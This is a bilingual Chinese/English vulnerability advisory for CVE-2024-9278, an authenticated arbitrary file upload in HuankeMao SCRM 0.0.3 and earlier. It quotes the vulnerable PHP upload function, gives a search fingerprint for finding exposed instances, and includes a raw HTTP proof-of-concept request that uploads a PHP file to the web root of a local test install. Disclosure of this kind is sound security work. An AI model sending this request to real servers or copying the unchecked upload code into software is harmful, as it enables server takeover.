【原创】（CVE-2024-9278）HuankeMao SCRM <=0.0.3 文件上传漏洞

当前为私密分享，无需登录即可查看。

时间	作者	可见性	等级	Rank
2024-09-16 19:58:23	jackieya	公开的	高危	3

CVE-2024-9278
Created: 09/27/2024 07:41 AM
Changes: 09/27/2024 07:41 AM (57)
Submitter: jackieya@wiki

漏洞描述

唤客猫SCRM 是一款基于企业微信的数据化精细运营服务系统，帮助企业实现智慧、简单、友好、精细的客户运营管理。

唤客猫SCRM <=0.0.3 的管理员后台存在任意文件上传漏洞，攻击者可以利用该漏洞上传后门文件从而获取服务器权限。

- HuankeMao SCRM is a data-driven, finely operated service system based on Enterprise WeChat, helping businesses achieve intelligent, simple, friendly, and detailed customer operation management.
- There is an arbitrary file upload vulnerability in the backend of the HuanKeMao SCRM 0.0.3. Attackers can exploit this vulnerability to upload backdoor files and gain server privileges.

github项目地址：https://github.com/huankemao/huankemao-php

Github：https://github.com/huankemao/huankemao-php

资产测绘

body="唤客猫"

null

漏洞分析

漏洞点位于app\admin\controller\v1\WxkConfig.php的upload_domain_verification_file函数中：

- The vulnerability is located in the `upload_domain_verification_file` function of the `WxkConfig.php` file in the `app\admin\controller\v1` directory.

public function upload_domain_verification_file(){
        if (!isset($_FILES['domain_verification_file'])){
            response(500, '文件为空');
        }
        move_uploaded_file($_FILES['domain_verification_file']['tmp_name'], $_FILES['domain_verification_file']['name']);

        response(200, '操作成功', $_SERVER['HTTP_HOST'] . '/' . $_FILES['domain_verification_file']['name']);
    }

这里没有对上传文件进行严格校验，直接上传到网站根目录了。

- There is no verification for the upload file type here, you can directly upload the file to the website root directory

POC

该漏洞需要登录到后台进行利用：
登录后点击页面右上角的“设置”图标

- This vulnerability requires logging into the backend for exploitation
- After logging in, click on the "Settings" icon in the upper right corner of the page

null

点击“上传校验文件”按钮

- Click the "Upload verification file" button

null

上传个txt文件后抓包，将文件后缀改为php，得到下面这个poc：

- After uploading a txt file and intercepting the data packet, change the file suffix to php to obtain the following POC:

POST /admin.php/upload_domain_verification_file HTTP/1.1
Host: 127.0.0.1:83
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryYUNSO2a0qBTk9UVQ
Content-Length: 685

------WebKitFormBoundaryYUNSO2a0qBTk9UVQ
Content-Disposition: form-data; name="time"

1726487021
------WebKitFormBoundaryYUNSO2a0qBTk9UVQ
Content-Disposition: form-data; name="user_id"

71712684-324d-dbcc-f654-fee216e6453e
------WebKitFormBoundaryYUNSO2a0qBTk9UVQ
Content-Disposition: form-data; name="token"

fa4808a150e55b8aec0aa1bbea7438174e265464
------WebKitFormBoundaryYUNSO2a0qBTk9UVQ
Content-Disposition: form-data; name="sign"

46908fde63883cae06d059a4972809dd
------WebKitFormBoundaryYUNSO2a0qBTk9UVQ
Content-Disposition: form-data; name="domain_verification_file"; filename="1.php"
Content-Type: text/plain

<?php phpinfo();?>
------WebKitFormBoundaryYUNSO2a0qBTk9UVQ--

上传后访问http://127.0.0.1:83/1.php,成功执行phpinfo()代码

- Access after uploading http://127.0.0.1:83/1.php Successfully executed the php info () code

null